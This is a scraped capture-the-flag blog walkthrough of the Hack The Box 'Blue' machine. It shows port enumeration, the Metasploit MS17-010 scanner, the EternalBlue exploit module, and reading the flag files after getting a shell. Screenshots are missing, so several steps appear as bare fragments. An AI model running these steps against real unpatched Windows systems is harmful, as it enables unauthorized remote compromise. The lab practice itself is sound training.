Blue Walkthrough Hack The Box
Blue Walkthrough Hack The Box
Rakshan Sharma
·
Follow
6 min read
·
Aug 31, 2020
1
So, this is an easy machine and the name of the machine really is a
giveaway but still it is a great machine simply because how common
ms17–010 is and how far reaching it really is. A lot of exploits that
don’t seem to be connected rely on it. Anyways, let’s get to the
machine walkthrough.
139, 135, 445, 49152, 49153, 49154, 49154, 49155, 49156, 49157
After this, I also ran a script vulnerability scan on the top 3 ports.
rpcinfo -p 10.10.10.40
By no means is this the only command worth running for rpc but
since we already have a vulnerability to exploit, we can forgo going
through some advanced script testing on rpc.
After a little bit of googling I found out that it’s a remote buffer
overflow that can potentially open a shell. After a bit more googling,
I found a rapid7 search result which means there is probably an
exploit in METASPLOIT for this.
https://www.rapid7.com/db/modules/exploit/windows/smb/
ms17_010_eternalblue
Looks like there is a scanner that can confirm the vulnerability. Let’s
quickly run that and confirm our suspicions.
use auxiliary/scanner/smb/smb_ms17_010
I quickly ran the scanner and it looks like the host is vulnerable to ms17–
010
msf5 exploit(windows/smb/ms17_010_eternalblue)
> exploit
Success!!!
cd shellcode
./shell_prep.sh
./listener_prep.sh
Simply run
Success
So, wait for some time after this and you should get a meterpreter
shell open.
We’re in
Finding the flags
Flags
cd ../../Users/Administrator/Desktop
type root.txt
cd ../../haris/Desktop
type user.txt
https://medium.com/@rakshan793/blue-walkthrough-hack-the-box-7d5a87db5dbe